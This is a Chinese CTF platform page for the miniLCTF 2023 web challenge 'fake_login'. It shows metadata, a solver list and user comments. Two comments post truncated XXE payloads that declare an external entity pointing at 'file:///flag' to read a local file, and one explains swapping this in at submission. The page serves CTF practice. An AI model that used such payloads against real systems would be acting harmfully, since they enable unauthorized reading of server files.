fake_loginWEB 未解决

分数: 0 金币: 0
所属赛事: miniLCTF 2023
题目作者: 未知
一  血: dai
一血奖励: 0金币
解  决: 31
提  示:
描  述:
flag{}
评论
MRLD 1年前

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE user [ <!ELEMENT name ANY > <!ENTITY admin SYSTEM "file:///flag" >]> <user><userna

回复 0

MRLD 1年前

真得出生出题人,假flag是真的,闲的这样搞

回复 0

gooddemo 1年前

这个是xxe漏洞,所以在点击提交按钮时,修改Payload,内容如下:<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag">]> <user><use

回复 0

hopeinhand 2年前

找半天结果假flag是真的,很迷惑

回复 0

WriteUp

image
hopeinhand

1 金币

评分(0)

暂无评分

解题动态

minz 攻破了该题 29天前
xujunjjj 攻破了该题 1月前
wbiao 攻破了该题 3月前
nuxe 攻破了该题 3月前
ssoocc 攻破了该题 4月前
倦鸟叫了一整天 攻破了该题 6月前
amobaishi 攻破了该题 10月前
biandanjun 攻破了该题 12月前
tianna 攻破了该题 1年前
coldplay99999 攻破了该题 1年前
Rg 攻破了该题 1年前
WCRH 攻破了该题 1年前
POEighT 攻破了该题 1年前
wangjf 攻破了该题 1年前
t1tl3d 攻破了该题 1年前
fuhuameng 攻破了该题 1年前
cxy18 攻破了该题 1年前
Ramrem 攻破了该题 1年前
平凡的人 攻破了该题 1年前
小何lv 攻破了该题 1年前
问题反馈